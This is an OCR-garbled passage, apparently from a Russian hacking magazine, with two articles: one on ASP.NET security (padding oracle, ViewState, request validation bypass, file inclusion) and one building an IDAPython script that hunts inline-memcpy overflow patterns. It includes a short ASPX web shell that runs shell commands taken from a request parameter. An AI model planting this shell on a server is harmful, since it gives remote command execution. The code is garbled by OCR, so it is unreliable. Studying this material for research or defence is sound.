а также включает в себя дайджест для контроля ее целостности: 
0І~/5сгірЫ5сгірП.)5,~/5сгірЫ5сгірі2.із,~/5сгірІ5/5сгіріЗ. 
І5І#|21с38аЗа9Ь. 

Очевидно, что, обладая тасЫпе кеу, атакующий имеет воз- 
можность запрашивать через эти обработчики произвольные 
ресурсы, а через БсгіріРезоигсе.ахсІ и произвольные файлы внутри 
каталога веб-приложения. Идентификатор ресурса шифруется 
симметричным алгоритмом (ЗйЕБ или АЕБ) в режиме СірЬег ВІоск 
СЬаіпіпд (СВС). Именно с этим была связана уязвимость «оракула 
дополнения» (расИіпд огасіе) М510-070, обнаруженная исследова- 
телями из Лига БоЙѵѵаге Бесигііу ( ЬіІ.Іѵ/ОбВІРѵ ) и заключавшаяся 
в возможности подобрать тасЫпе кеу за приемлемое время, если 
сервер отдавал различные варианты ответов на следующие типы 
запросов с зашифрованными данными: 

1. Некорректный за шифрованный текст, корректное дополнение 
блока. 

2. Некорректный зашифрованный текст, некорректное дополнение 
блока. 

Имея возможность различать ответы сервера на такие запросы 
каким-либо образом (статус ошибки, сообщение об ошибке в тек- 
сте страницы, различное время обработки разных типов запросов), 
атакующий мог восстановить тасЫпе кеу, отправив несколько 
тысяч запросов веб-приложению. Получив ключ, он имел возмож- 
ность: 

1. Подделыватьаутентификационныетокены (представляющие 
собой зашифрованные строки с информацией о субъекте аутен- 
тификации). 

2. Расшифровыватьи подделыватьданные состояния приложения 
и подтверждения событий (см. ниже). 

3. Подделывать аргументы для обработчиков ѴѴеЬРезоигсе.ахсІ 

и БсгіріРезоигсе.ахсІ, а следовательно — получать произвольные 
файлы из каталога веб-приложения. 

Выпущенный патч, устраняющий данную уязвимость, вносил 
следующие изменения: 

1. Использование обобщенного сообщения об ошибке в случае не- 
корректного дополнения. 

2. Улучшенный алгоритм генерации вектора инициализации. 

3. Использование дайджестов для проверки подлинности аргумен- 
тов НТТР-обработчиков. 

4. Запретна получение при помощи БсгіріРезоигсе.ахсІ каких-либо 
файлов, за исключением сценариев ЗаѵаБсгірЕ 

К сожалению, ситуация «все яйца в одной корзине» так и не 
была устранена. МасЫпе кеу по-прежнему используется для ряда 
чувствительных операций: шифрования состояния представ- 
ления, подтверждения событий, аргументов ѴѴеЬРезоигсе.ахсІ/ 
БсгіріРезоигсе.азсІ. Следовательно, его компрометация по любому 
из этих каналов влечет за собой компрометацию всего шифрова- 
ния А5Р.ІМЕТ, используемого при взаимодействии с клиентской 
стороной. 




Вывод Тгасе.ахсІ 



Следует отметить, что проведение атаки «расісііпд огасіе» по- 
прежнему возможно в том случае, если веб-приложение на своем 
уровне раскрывает ошибки дополнения, позволяя отличить их от 
других сбоев (например, выводя подробную информацию о возник- 
шем исключении). Другая возможная уязвимость: ошибки реализа- 
ции функций шифрования сторонних (по отношению к фреймворку) 
данных, передаваемых на сторону клиента. 

При анализе защищенности веб-приложения А5Р.ІМЕТ не- 
обходимо уделить особое внимание поиску возможных «оракулов 
дополнения» (то есть путей утечки информации) в силу высокой 
степени риска связанных с ним уязвимостей. Для этого можно вос- 
пользоваться утилитой расІЬизІегсіоІпеІ, позволяющей автоматизи- 
ровать процесс обнаружения «оракулов дополнения» ( ЬіЕІѵ/9сдІп2 ). 
Еще один вектор — реализация обработчиков ошибок, связанных 
с расшифровыванием данных, полученных с клиентской стороны, 
и любые сторонние реализации шифрования ресурсов, пересекаю- 
щих границу доверия веб-приложения в обе стороны. 

СОСТОЯНИЕ ПРЕДСТАВЛЕНИЯ, 

ПОДТВЕРЖДЕНИЕ СОБЫТИЙ И ЗАПРОСОВ 

Состояние представления (ѴіеѵѵБіаІе) и подтверждение событий 
(ЕѵепіѴаІісІаЬоп) являются встроенными механизмами обмена инфор- 
мацией с клиентской стороной в ѴѴеЬ Рогтз приложениях А5Р.ІМЕТ. 

Механизм ѴіеѵѵБіаІе представляет собой параметр-контейнер, 
«пробрасываемый» через НТТР-запросы и хранящий информацию 
о свойствах всех элементов управления текущей веб-формы А5Р. 
ІМЕТ. Достаточно часто он используется разработчиками в каче- 
стве дешевой альтернативы данным сессии для их хранения на 
стороне клиента. Фреймворк А5Р.ІМЕТ поддерживает шифрование 
и проверку целостности данного контейнера (как две не связанных 
друг с другом возможности), которые, однако, часто отключаются 
разработчиками для отладки продуктивных систем, что ставит 
под угрозу целостность всего контейнера и конфиденциальность 
хранящихся в нем данных. Более подробную информацию об угро- 
зах, связанных с неправильным использованием и/или конфигу- 
рированием ѴіеѵѵБіаІе, можно получить в статье Тимура Юнусова 
«ѴіеѵѵБіаІе Ѵиіпега Ьіііііез» ( ЬіЕІѵ/ТАН ). 

Механизм ЕѵепіѴаІісІаЬоп является аналогичным контейнером, 
предназначенным для подтверждения данных, отправляемых 
на сервер в результате каких-либо событий на стороне клиента. 

В этом контейнере хранится информация обо всех возможных 
значениях полей, для которых включен механизм подтверждения 
событий, в виде их хеш-кодов. 
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Механизм ѴіеѵѵЗІаІе 



Многие думают, что включенный механизм подтверждения 
событий препятствует проведению атак подделки межсайтовых 
запросов (СЭРЕ). Однако это не совсем верно. Механизм подтверж- 
дения событий препятствует отправке в полях формы (для которых 
этот механизм включен) значений, отсутствующих в белом списке, 
хранящемся в контейнере ЕѵепіѴаІісЫіоп. Как правило, это не ме- 
шает успешному проведению атак С5РР. Этот механизм может быть 
использован для противодействия данному классу атак, однако 
это требует дополнительных усилий со стороны разработчика. 
Аналогично ѴіеѵѵЗіаІе, ЕѵепіѴаІісІаІіоп также поддерживает шифро- 
вание и контроль целостности, которые включены в конфигурации 
по умолчанию. 

Механизм подтверждения запросов (Рериезі Ѵаіібаііоп) яв- 
ляется, по сути, примитивным ѴѴАР, встроенным в А5Р.ЫЕТ для 
противодействия атакам Х55. Его логика предельно проста: запре- 
тить обработку веб-приложением запросов, параметры которых 
удовлетворяют любому из следующих условий: 

1 Содержиткомбинацию&# 

2. Содержит символ < с последующей за ним буквой или символами / ! ? 

3. Содержитсторонний параметр, начинающийся с 

Никаких иных правил данный «ѴѴАР» не реализует. Очевидно, 
что он может быть эффективен только тогда, когда при эксплуата- 
ции Х55 входные данные попадают между тегами НТМЬдокумента. 
В любом другом случае обойти его не составит особого труда. 

В А5Р.ЫЕТ версий 1.1-4. 0 подтверждение запросов было 
глобальным для всех страниц сайта механизмом, распространяв- 
шимся на параметры строки запроса и поля веб-форм. В версии 
4.5 у разработчиков появилась возможность отключать его для 
отдельных страниц, использовать «ленивое подтверждение» (вы- 
полняющееся непосредственно при обращении к данным запроса) 
и осуществлять доступ к неподтвержденным данным. Кроме того, 
в этой версии подтверждение распространяется на все параметры 
запроса, включая заголовки НТТР и соокіез. 

Ш 

Распространено мнение, что веб-приложения А5Р.ЫЕТ не подвер- 
жены атакам включения локальных файлов либо что в результате их 
невозможно осуществить выполнение кода во включаемых файлах. 
Это, конечно же, не так. В А5Р.ЫЕТ есть целых три способа, с помощью 
которых разработчики могут сделать веб-приложение уязвимым 



к атакам 1_РІ, причем один из них позволяет выполнить код, находя- 
щийся во включаемом файле. Все эти способы относятся к некоррект- 
ному использованию функций, связанных с файловыми операциями: 
Ре5роп5е.ѴѴгіІеРіІе(<ѵЛІепате>) — включает файл, путь к кото- 
рому передан в аргументе, в формируемый ответ на запрос. Путь 
является виртуальным и относительным корня веб-приложения. 
5егѵег.ЕхесиІе(<ѵЛІепате>) — вызывает обработчик для файла, 
путь к которому передан в аргументе. Результат выполнения об- 
работчика включается в формируемый ответ на запрос. Путь явля- 
ется виртуальным и относительным корня веб-приложения. 
РіІе.РеасІАІІТехіМіІепате>) — то же, что и Резропзе.ѴѴгіІеРіІе^ѵЛІе- 
пате>), но путь является физическим и может быть абсолютным. 

Таким образом, второй вариант дает все, что нужно для І_РІ с вы- 
полнением кода, с двумя ограничениями: 1) атакующий должен иметь 
возможность загрузить азрх-файл внутри каталога веб-приложения 
и 2) атакующий должен также иметь возможность формировать 
путь к файлу, манипулируя входными данными запроса. Разумеет- 
ся, второе ограничение в равной степени относится и к остальным 
вариантам. При этом необходимо учитывать следующие особенности: 

1. Всоставепути (как виртуального, таки физического) могут 
использоватьсяуказатели на родительский каталог!..). Однако 
в случае виртуальных путей выбратьсяза пределы корневого 
каталога веб-приложения неудастся. 

2. Способов прервать формируемый путь (например, внедряя 
нуль-байт или дополняя путь сим вола ми точки до очень большой 
длины) на сегодняшний день не существует. 

Минимальный шелл-код, который может быть загружен в ка- 
честве включаемой азрх-страницы, во втором варианте может 
выглядеть следующим образом: 

<%@ Ра§е І_ап§иа§е="С#" %> 

<%@ Ітрогі: Мате5расе="5у5І:ет.Ріа^по5І:іс5" %> 

<%= 

Ргосе5$.51:аг1:( 

пем Ргосе5551:аг1:ІгтЕо( 

"стсІ'ѴІ'/с " + Кециез-Ь^'с" ] 

) 

{ 

ІІБе5Ііе11Ехеси1:е = -Раізе. 

КесІігес1:$1:апсІагсІОи1:ри1: = Іігие 

} 

) .51:апсІапсІОи1:ри1:. КеасІТоЕпсІ() 

%> 



Тестирование веб-приложения на подверженность атакам 
данного класса ничем не отличается от принятого для веб- 
приложений, основанных на других фреймворках, и заключается 
в попытках манипуляции параметрами, содержащими данные, 
похожие на виртуальные пути, имена файлов и тому подобные. При 
анализе кода необходимо обратить внимание на те его участки, 
в которых вызываются перечисленные методы, и убедиться, что 
передаваемые в них аргументы либо не зависят от входных дан- 
ных, либо проходят дополнительные проверки или очистку. 

ЗАКЛЮЧЕНИЕ 

Несмотря на общую среднестатистическую защищенность веб- 
приложений (благодаря дизайну фреймворков стека А5Р.ЫЕТ, 
строгой типизации и встроенным механизмам защиты), далеко не 
любое конкретное АЗР.МЕТ-приложение может считаться защи- 
щенным. Влиять на это могут и уязвимости самого стека фрейм- 
ворков и платформы (примеры были приведены выше), и уязвимо- 
сти, допущенные на уровне веб-приложения, отдельные классы 
которых к тому же являются уникальными для данного стека 
веб-технологий, что и доказывает лишний раз необходимость учета 
любой специфики исследуемого или разрабатываемого приложе- 
ния и его окружения. Ш 
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АВТОМАТИЗАЦИЯ 
ПОИСКА УЯЗВИМОСТЕЙ 
С ПОМОЩЬЮ 
ІОАРУТНОЫ 

Автоматизация поиска уязвимостей в ПО 
без исходных кодов — это весьма вкусная 
плюшка черной магии багхантинга. Но в столь 
ответственном деле без надежного помощника 
не обойтись. Встречайте ЮАРуІбоп — 
связующий элемент между языком РуіНоп 
и легендарным дизассемблером ЮА Рго. 

Он прекрасно справится с такой задачей. 



ЗНАКОМСТВО С АНАЛИЗОМ ПО 

Методы обнаружения уязвимостей на абстрактном уровне разли- 
чаются по цвету — «белый ящик», что светел знанием об исходном 
коде; «черный ящик» олицетворяет тьму незнания устройства по- 
допытной программы. Там, где свет и тьма сходятся, рождается ме- 
тод «серого ящика», применяемый при реверс-инжиниринге. Цель 
багоискателя — открыть ящик Пандоры с помощью реверсинга. 
Одна из категорий реверсинга — бинарный анализ. Это общее 
название методик постижения алгоритмов работы программы, 
восстановления исходного кода, поиска и анализа так называемых 
ключевых мест в коде, о которых будет сказано ниже. 

Принцип различия динамического и статического подходов 
к изучению программ кроется в вопросе «Іо гип, ог по* *о гип?» — 
то есть запускается программа на выполнение или нет. Следующая 
парочка — автоматический и ручной методы, которые различаются 
степенью относительного вмешательства Ногтю І_одіси5 в процесс 
анализа. Статический анализ заклинаниями кода превращает 
трассу, полученную от покрытия кода, в источник информации 
(хотя бы и поверхностной) о присутствии потенциальных уязвимо- 
стей. Такой источник делаетумнее фаззинг в памяти. 

Этим материалом я начинаю знакомить читателя с нектаром ло- 
гики анализа кандидатов (паттернов) уязвимостей. Поиск эксплуа- 
тируемых багов начинается с осмотра таких пациентов, как не- 
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безопасные функции работы со строками (зігсру, зігсаі), функции 
форматирования (семейка ргіпіі и так далее). Более сложен анализ 
циклов, іпііпе тетсру и других паттернов, где могут обрабатывать- 
ся входные данные, и обрабатываться ошибочно. Одним из таких 
ключевых мест, паттернов уязвимостей, является конструкция 
іпііпе тетсру — ассемблерный аналог функции тетсру. 

КОНСТРУКЦИЯ ІКІШЕ МЕМСРУ 

Ассемблерно-абстрактно конструкция іпііпе тетсру представляет 
собой набор следующих команд: 

тоѵ есх, счетчик (количество байт для копирования) 
тоѵ езі^указатель на память, откуда копировать 
тоѵ есіі. указатель, куда копировать 
пер гпоѵзсі, инстр у кция копирования 

Подобная конструкция может быть уязвимой, если значение 
регистра есх зависит от входных данных. А зависимость порождает 
контроль со стороны заинтересованного лица ;). 

Итак, у нас нарисовался вектор автоматизации — это обратная 
трассировка счетчика. Место действия — дизассемблерный ли- 
стинг ЮА. Для анализа потенциально уязвимых мест небезопасных 
функций с использованием дизассемблера ЮА существуют такой 
комплект скриптов, как Видзсат, скрипт деІепѵП, Вид йеіесіог, 
предназначенный для поиска дыр в одноименной функции, I пііпесі 
Зігіеп — скрипт для анализа ассемблерных конструкций, анало- 
гичных зігіеп. Все они написаны на встроенном скриптовом языке 
ЮА. Как ты уже понял, мы будем писать ЮАРуіЬоп-скрипт, упро- 
щающий поискуязвимостей в іпііпе тетсру. Скрипт будет состоять 
из трассировщика и анализатора. В задачи трассировщика будут 
входить поиск пути до начала функции и маркировка точки отсчета. 
Задача анализатора будет состоять в трассировке счетчика с целью 
выяснить, откуда кладется в него значение, происходят ли опасные 
операции со значением и не помещается лив счетчик жестко за- 
кодированное значение. К опасным операциям относятся арифме- 
тические операции ввиду своей возможности привести к ошибке 
целочисленных преобразований (зідпесі/ипзідпесі тізтаІсЫ, что, 
в свою очередь, как известно, влечет переполнение буфера, если, 
конечно, значение, которое использовал программист, является 
размером в операции копирования (затирания) памяти. 

Англоязычные термины, отображающие поставленные задачи 
скрипта, — это Ьаскігасіпд и баіаііоѵѵ апаіузіз. 

Памятуя слова Л. Торвальдса: «Болтовня ничего не стоит. По- 
кажите мне код», приступим к реализации. 

А МНЕ ДОСТАЛАСЬ ТРАССА... 

Для того чтобы научить трассировщик хождению по дизассемблер- 
ному листингу, мы будем использовать функцию РіігбіВ. «РіігзіВ 
возвращает адрес следующего источника в списке ссылок, то есть 
предыдущий адрес», — сказано в документации ЮА. По сути, эта 
функция будет являться важнейшей частью «шагательного» ме- 



ТРАССИРОВКА 



Процесс пошагового выполнения программы. В режиме 
трассировки программист видит последовательность выполнения 
команд и значения переменных на данном шаге выполнения 
программы, что позволяет легче обнаруживать ошибки. 
Трассировка может быть начата и окончена в любом месте 
программы, выполнение программы может останавливаться 
на каждой команде или на точках останова, трассировка может 
выполняться с заходом в процедуры и без заходов. 



ханизма. Задача этого механизма состоит в том, чтобы, используя 
ссылки, «идти вверх», вплоть до начала функции, вызывая анали- 
затор на каждом шаге. 

На пути трассировки нас ждут разные встречи. Например, цикл, 
легко превращающий трассировку в белку в колесе. Чтобы не уйти 
в бесконечный цикл и не превратиться в белку, будем использо- 
вать функции ЗеіСоІог и ОеіСоІог. Функция ЗеіСоІог устанавливает 
указываемый цвет на строку, функцию или сегмент. Функция 
6еіСоІог(еа, ѵѵЬаі) является частично «обратной» — параметр соіог 
ей не требуется. Функцией ЗеіСоІог мы будем окрашивать адреса, 
которые уже «прошагал» наш скрипт, а ОеіСоІог'ом проверять. Сто- 
ит отметить, что две эти функции отсутствуют в языке ЮА ЮС. Вот 
таким простым хаком мы обережем себя от зацикливания на одном 
и том же участке кода. 

Кстати сказать, такой окрасочно-распознавательный механизм 
отлично выручает при отладке скрипта. 

Результирующую информацию скрипт выводит в комментарии 
к точке начала анализа — адресу гер тоѵзсі. Комментарий до- 
бавляется с помощью функции МакеСотт, которая как аргумент 
использует адрес, указывающий, куда добавить комментарий, 
и переменную, содержащую строку с этим самым комментарием. 

Реализация представлена ниже: 

сіе-р Ргасег(еа.» ге§) : 

§1оЬа1 ѵиіпсоипр [#1] 

рагепР = СеРРипсРіопАРРг(еа,0) [#2] 

ыбі іе еа != рагепі:: 

хге-Р = КРгзРВ(еа) [#3] 

соттепііесі = ісІаарі.§еР_стР(тоѵ5асІсІг.Ѳ) 

ІР соттепРесІ 1= ІМопе: [#4] 
геііипп 

ІР 6еРСо1ог(еа,СІС_ІТЕМ)==0хе5РЗРР: [#5] 

геРигп 

еізе: 

5еРСо1ог(еа.СІС_ІТЕМ.0хе5РЗРР) [#6] 
ге^=АпаІУ 2 ег(еа. ге^.хгеР) [#7] 
еа = хгеР [#8] 

ІР хгеР == ѲхРРРРРРРР : [#9] 

геРигп 

Ргасег(еа.» ге§) [#10] 
геРигп пе§ 

ІР еа == рагепР: [#11] 

соттепР="ипкпомп. Ѵи1псоипР=%5" % ѵиіпсоипр [#12] . \ 
МакеСотт (асІсІгоРтоѵБ., соттепР) 
геРипп 
геРигп ге§ 

Немного поясню суть кода. Объявляем глобальную переменную 
для счетчика «подозрительных встреч» [#1]. В рагепі помещаем 
адрес начала родительской функции [#2]. В цикле, где еа — адрес 
гер тоѵзсі, получаем адрес-ссылку [#3], проверяем наличие 



.ІИ I ИММ^^ ІІМІ МиІД I» 




Примеруязвимости в СгеаІе 5 І 2 еОІВ 5 ЕСТЮМ(М 511 - 006 )( 1 ) 



ХАКЕР 10/165/2012 



069 





взлом 



комментария [#4], след [#5]. Если окрашено или закомментирова- 
но — выходим, иначе машем кисточкой [#6]. Вызываем анализа- 
тор, помещая трассируемое значение в гед [#7]. Делаем шаг [#8]. 
Проверяем, а вдруг пропасть [#9]? «Чтобы понять рекурсию, нужно 
сперва понять рекурсию» (с) [#1 0]. Если тупик уж под ногами [#11], 
не забыв про ѵиіпсоипі, комментируем [#12]. 

Такая вот двигательная система. Шагать мы научились, теперь 
пора развивать «мозги». 

Предназначение анализатора — понимание «отношений» 
между инструкциями и операндами в процессе потока дан- 
ных (баіаііоѵѵ). «Органы чувств» анализатора — это функция 
беіМпет(еа), возвращающая мнемонику инструкции по за- 
данному адресу, 6еШрпсі(еа, п) — возвращающая операнд, 
Зеі0рТуре(еа,п] — возвращающая тип операнда. Анализатор ис- 
пользует счетчик подозрительных признаков, располагающийся 
в глобальной переменной. Счетчик — хранитель репортов об опе- 
рировании со счетчиком математическими инструкциями, а также 
размещении в нем результатов функций вычисления длины. Оба 
признака повышают вероятность наличия уязвимости. 

Настала пора рассмотреть механизм анализа. 

ТАМ, НА НЕВЕДОМЫХ ДОРОЖКАХ 



РЕР ІРМОѴІ) 

Встречая команды пересылки тоѵ, Іеа, тоѵгх, проверяем, что 
помещается в трассируемый регистр: значение другого регистра, 
значение из памяти или же жестко закодированное значение. 
Взглянем на следующий код: 

зиЬ еаХд_е5І 

тоѵ есх^еах ; в есх помещаетс я еах 
тоѵ есІХд_есх 
5 Иг есх, 2 
пер тоѵзсі 

Логика ассемблера: в есх помещается еах. Логика анализа- 
тора: еах — объект трассировки. Ранее с регистром еах вступала 
в отношения команда зиЬ, грозящая арифметической ошибкой. 



Таковы особенности данного іпііпе тетсру. Кстати, этот код — 
слабое звено и причина переполнения стека в Оиііоок Ехргезз 
(М505-030). 

Давай посмотрим, что может делать анализирующая функция 
при встрече с инструкциями-пересыльщиками: 

і-р ееіМпет(еа) іп тоѵегз: 

і-р беіМпеітКеа) == "Іеа": [#1] 
ге§ = ееіОрпсІ(еа.,1) 
ге§ = ге§[1:4] 
геііигп ге§ 

і-р беТОрТуреРеа . 1)==5 : [#2] 

ргіпі "ѵаіие о-Р соипіег із ИагсІсосІесІ ! : (" 
соттеп1:= ,, ипіп1:еге5І:есІ ! " 

МакеСоттРасІсІпо-Ртоѵз . соттепі:) 
геііигп ге§ 

і-р Се1:ОрТуре(еа.,1)==1: 
ге^=6е1:0рпсІ(еа . Р [#3] 
геііигп ге§ 

# если: тоѵ есх. [еЬр+аг^_4] [#5] 

ІТ ге.та1:сІі( ' . *аг§. * ' ^ СеІіОрпсІ ( еа ^ 1 ) 

ргіпі "Соипі -Ргот -Рипсііоп аг^итепі:" 
соттеп1:="Соип1: -Ргот аг§ ог Іосаі ѵаг. \ 
Ѵиіпсоипі^з" % ѵиіпсоипі # подпись 
МакеСотт(ас1с1го-РтоУ5 л соттепі) 
еізе: 

соттепі="1)пкпомп. Ѵиіпсоипі: =%з" % ѵиіпсоипі: [#4] 
МакеСоттРасІсІго-Ртоѵз . соттепі) 
геіигп ге§ 
геіигп ге§ 

Пересыльщики могут в трассируемый регистр поместить 
постоянное значение, значение из указателя, значение из 
аргумента функции, другой регистр. Инструкция Іеа часто воз- 
действует на гед следующим образом: Іеа гед, [гед32+гед32], где 
гед32 — другой регистр. В этом случае трассируемым становится 
другой регистр [#1]. Постоянное значение в счетчик помещается, 
как правило, с использованием пары инструкций ризЬ/рор, но на 




Результат работы скрипта с зЫтдѵѵѵ.сІІІ 



ПОЛЕЗНАЯ ЛИТЕРАТУРА 
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Целочисленные операции со счетчиком 
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Фрагмент кода с потенциальной уязвимостью (если ѵѵсзіеп «измеряет» 
контролируемые данные) 
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Охота на счетчик 




всякий случай обработка тоѵ гед,ітт32 необходима (в недрах 
тзЫтІ.бІІ это присутствует) [#2]. Если в гед помещается другой 
регистр, то он и становится объектом пристального внимания 
;) [#3]. В случае помещения значения из указателя трассировка 
прекращается и данному іпііпе тетсру присваивается статус 
«ипкпоѵѵп» [#4]. Помещение значения из аргумента функции, сте- 
ковой переменной, встречается весьма часто и представляет для 
исследователя интересный пример наивного доверия входным 
данным [#5]. При нацеливании на такую функцию «фаззинга в па- 
мяти» падение исследуемой программы очень даже вероятно. 

йЕР І5Р0РІ) 

Пересыльщиками жестко закодированного значения чаще всего 
служат стековые инструкции ризЬ и рор. Алгоритм обнаружения 
и анализа этой парочки таков: 

і-р 6еіМпет(еа , )=="рор" : 
тахзіерз=6 
соип1:=Ѳ 

ыбііе соипі [=_ тахзіерз: 
хге-Р = КбгзіВ(еа) 
еа=хгеі 
іі еа ! = -1: 

і-р 6еіМпет(еа)=="ри5Іі" : [#1] 

і-р 6еіОрТуре(еа.Ѳ)==5: [#2] 

ргіпі: "ѵаіие о-Р соипіег із \ 

ЬагсІсосІесІ ! : ((" 
соттепі="ипіпіегезіеб ! " 
МакеСоттСаббго-Ртоѵз, соттепі) 
геіигп 

5еіСо1ог(еа . СІС_ІТЕМ . ѲхеБіЗ-РП 
соипі=соипі+1 
еізе: 

Ьгеак 

ргіпі: "ипкпомп ѵаіие" 

ргіпі: "ѵиіпсоипі =%з " % ѵиіпсоипі 

соттепі:="ип кпоып" 

МакеСотт(аббгоітоѵ5 . соттепі 1 ) 
геіигп ге§ 
геіигп ге§ 

В цикле ищем ризб [#1]. Как правило, ему сопутствует жестко 
закодированное значение [#2]. А значит, данный паттерн обознача- 
ем как неинтересный. 

С пересыльщиками разобрались. Далее рассмотрим, как саІІ 
может влиять на счетчик. 

йЕР ІГСАЫ-0 

Смак здесь в том, что если вызов осуществляется к одной из 
функций, возвращающих длину строки, — зігіеп, ѵѵсзіеп и тому 



подобным — и трассируемый регистр — еах, то из этого следует, 
что значение счетчика очень может зависеть от входных данных 
в программу, а значит, существует вероятность захвата контроля 
над ним. 

В приведенном ниже листинге происходит следующее: полу- 
чаем имя функции [#1]; если еах — трассируемый регистр и слово 
«Іеп» присутствует в названии функции [#2], то увеличиваем 
счетчик подозрительных признаков, выводим результирующую 
информацию и добавляем комментарий к гер тоѵзб. При встрече 
с другими функциями отчитываемся о неизвестности [#3]. 

і-р 6еіМпет(еа)^"саП" : 

іипспате=ееіОрпб(еа.,0) [#1] 

і-р ге§=="еах" : 

і-р ге.таісбС ' ,*1еп.*' ,-Рипспате . ге.ІбІМОКЕСАБЕ) : [#2] 
ргіпі "І_еп іп -Рипспате" 
ѵиіпсоипі: = ѵиіпсоипі+і 
ргіпі "Іеп^іб саісиіаіесі сіупатісаііу ! " 
ргіпі "ѵиіпсоипі =%з " % ѵиіпсоипі 
соттепі="1еп§іІі саісиіаіесі сіупатісаііу!" 
МакеСотігКаббго-Ртоѵз . соттепі) 
геіигп 

еізе: 

ргіпі "ипкпомп ѵаіие" [#3] 
ргіпі "ѵиіпсоипі =%б " % ѵиіпсоипі 
соттепі="ІІпкпоып . Ѵи1псоипі=%5" % ѵиіпсоипі 
МакеСотігКаббго-Ртоѵз . соттепі) 
геіигп ге§ 
геіигп ге§ 

Со значением счетчика, помимо рождения его Іеп-функциями 
и пересылки, могут происходить целочисленные преобразования. 

йЕР ІРМАТНІ) 

Ошибки целочисленных преобразований случаются при выпол- 
нении арифметических операций, а также знакового расширения. 
Такие ошибки являются квинтэссенцией уязвимостей іпіедег 
оѵегНоѵѵ/ипбегНоѵѵ. То есть цели для 6еіМпет() — это инструкции 
зиЬ, асісі, бес, іпс, тиі, ітиі, тоѵзх. 

В качестве примера приведу упомянутый МісгозоИ ОиІІоок 
Ехргезз ІМІМТР Резропзе Рагзіпд ВиІТег ОѵегІІоѵѵ ѴиІпегаЬіІіІу: 



зиЬ еах., езі ; математическая инструкция работает 



; с будущим счетчиком 


тоѵ 


есх. 


еах 


тоѵ 


ебх. 


есх 


5 И Г 


есх, 


2 


гер 


тоѵзб 





Знаковое расширение, производимое инструкцией тоѵзх, часто 
является фатальной операцией для безопасности ПО. Один из на- 
глядных примеров этого — уязвимый код, вызывающий целочис- 
ленное переполнение в Арріе ОиіскТіте РІауег И. 264 Собес: 

тоѵ5х ебх.сх ; знаковое расширение 

тоѵ есх л ебх 

тоѵ еЬх л есх 

з б г есх.,0х2 

Іеа езі, [еах+0х8] 

Іеа ебі, [е5р+Ѳх18] 
гер тоѵзб 

Здесь мы видим, что с регистром ебх происходит знаковое рас- 
ширение. Это значит, что значение ебх принимает вид ОхРРРРхххх. 

Код, проверяющий присутствие арифметических команд 
и комментирующий адрес точки отправки — инструкции гер тоѵзб, 
очень прост: 



ХАКЕР 10/165/2012 



071 



взлом 



«...КОГДА МЕНЯЕТСЯ СУТЬ. 
КОГДА МЕНЬШЕЕ СТАНОВИТСЯ 
БОЛЬШИМ. КОГДА МИР 
ПЕРЕВОРАЧИВАЕТСЯ» — ЭТО 
НЕ НАЧАЛО ЭПИЧЕСКОЙ САГИ 



таіІітаББІѵ = ["іпс" . "асісі" . "зиЬ" . "сіес" . "тиі" . "іти1" . "шоубх"] 
і-р 6е1:Мпет(еа) іп таіІітаББІѵ: 
ѵиіпсоипі: = ѵиіпсоипі+і 

ргіпі_^Мау Ье Неге 5І§песІ/ип5І§песІ тІБтаІісИ ! " 

ргіпі "Ѵиіпсоипі: =%б " % ѵиіпсоипі: 
геіигп пе§ 

Стоит отметить, что по-хорошему нам в подобных случаях сле- 
дует трассировать первый операнд инструкции тоѵзх, ведь цело- 
численное переполнение возникнет, только если первый операнд 
отрицателен. 

К іпіедег оѵегНоѵѵ причастны не только арифметические 
команды, но и подход к операции сравнения. Если сравниваются 
числа со знаком и один из операндов сравнения — трассируе- 
мый регистр, то такое обстоятельство заслуживает пристального 
внимания. Итак, прицел на инструкцию стр, за которой следует 
знаковый переход. 

йЕР І5СМРІ) 

«...Когда меняется суть. Когда меньшее становится большим. 

Когда мир переворачивается» — это не начало эпической саги, 
а то, что происходит со счетчиком, когда его значение неправильно 
интерпретируется и условный переход кидает счетчик с огромным 
размером в операцию гер тоѵзсі. 

Виновники рокового перехода — условные знаковые пере- 
ходы — ]д , \\, ]де, ]1е, ]пд, ]пде, \п\, щіе. В дикой природе группа 
«джампов», зависящих от знака, всегда где-то рядом с операцией 
сравнения. Ниже представлен найденный багоискателем Луиджи 
Аурьеммой (І_иіді Аигіетта) в недрах АпдеІВегѵег листинг, в кото- 
ром видна такая искомо-целевая ситуация: 

стр еБІ .ітт ; ѳбі под контролем 
гер біобсі 

д§е Ап§е15ег .ѲѲ4Ѳ23РЕ : знаковый переход 



тоѵ есх л езі 

Іеа езі., [еЬр+0хс] 

тоѵ есІх л есх 

Іеа есіі. [езр+0х24] 

б М г* есх.,2 

гер тоѵзсі 

Искомая, потому что о ней идет речь. Целевая, потому что на та 
кие трофеи анализатор тоже будет нацелен. Скелет зверя таков: 

стр ігасеге§.» ітт/ге§ ; сравнени е трассируемого 

; регистра с непосредственным 

; значением или другим регистром 



д [ §1 I ; групп а пер ехо дов, представ л ен ных 
; с помощью магии регулярных выражений 

Если от стр, «вниз шагая» [#2], находим один из знаковых 
переходов [#3], заключенных в массив [#1], то рапортуем, плюсу- 
ем. Если переход беззнаковый и происходит сравнение трасси- 
руемого регистра непосредственно с жестко закодированным 
значением [#4], то маркируем данный іпііпе тетсру как неинте- 
ресный. 

і-р ееіМпеіг^еаЭ^'стр" : 

іпіегеБііп^дитрБ = ["де", "д ГУ'дее'У'д Іе'Ѵ'д пе", \ 

"дп^е", "іпі" . "іп іе"] [#1] 

■Рог соипі : іп гап^еРБ) : 
еа = КРігБІі(еа) [#2] 
тпет = Се1:Мпет(еа) 
і-р тпет іп іпіеге зІііп^іит рБ : [#3] 
ѵиіпсоипі = ѵиіпсоипі+і 
Ьгеак 

геіигп пе§ 

і-р 6еіОрТуре(еа ,1)==5: [#4] # если 1-й операнд - 

# постоянное значение 

соттепі="ипіп1:епе5І:есІ Л" 

МакеСотт( асісі го-Ртоѵ5 л соттепі) 

5еіСо1ог(хге-Р.СІС ІТЕМ.ѲхеБ-РЗ-р-Р) 
геіигп 
геіигп ге§ 

Таков нехитрый анализ, связанный с инструкцией стр. 

ЗАКЛЮЧЕНИЕ 

Трассировщик и анализатор в сборе. Естественно, эту сборку 
придется «допилить» под себя, но я уверен, что для тебя это не со- 
ставиттруда. ЮАРуЛіоп ждеттвоих указаний. Нарру Н и пііпд ! Ш 



ША РРО 



ША Рго ОІБЭББетЫег — интерактивный дизассемблер, 
который широко используется для реверс-инжиниринга. 

Он отличается исключительной гибкостью, наличием 
встроенного командного языка, поддерживает множество 
форматов исполняемых файлов для большого числа 
процессоров и операционных систем. Позволяет строить 
блок-схемы, изменять названия меток, просматривать 
